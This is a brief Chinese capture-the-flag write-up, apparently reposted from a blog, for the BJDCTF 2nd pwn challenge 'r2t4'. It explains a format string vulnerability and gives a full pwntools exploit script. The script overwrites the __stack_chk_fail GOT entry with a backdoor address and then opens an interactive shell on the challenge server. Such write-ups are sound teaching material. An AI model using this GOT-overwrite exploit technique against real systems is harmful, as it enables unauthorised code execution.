[BUUCTF-pwn]——[BJDCTF 2nd]r2t4
作者:互联网
[BUUCTF-pwn]——[BJDCTF 2nd]r2t4
checksec一下,看一下。
IDA中,发现了后面函数和格式化字符串漏洞。
找到后门函数的地址, 并且算格式化字符串的偏移
思路
开启了canary保护,我们想要执行我们想要执行的代码, 可以通过触发canary保护, 进而触发__stack_chk_fail函数,执行。我们将got表地址改为我们想要执行的地址就可以了。
fmtstr_payload是pwntools继承的一个模板,可以用来直接修改地址
exploit
from pwn import *
context(arch='amd64',os='linux',word_size='64')
backdoor = 0x0000000000400626
p = remote("node3.buuoj.cn",25583)
elf = ELF('./r2t4')
__stack_chk_fail = elf.got['__stack_chk_fail']
payload = fmtstr_payload(6, {__stack_chk_fail:backdoor}).ljust(0x38, 'a')
p.sendline(payload)
p.interactive()
标签:__,stack,chk,2nd,r2t4,pwn,fail,payload 来源: https://blog.csdn.net/Y_peak/article/details/113934330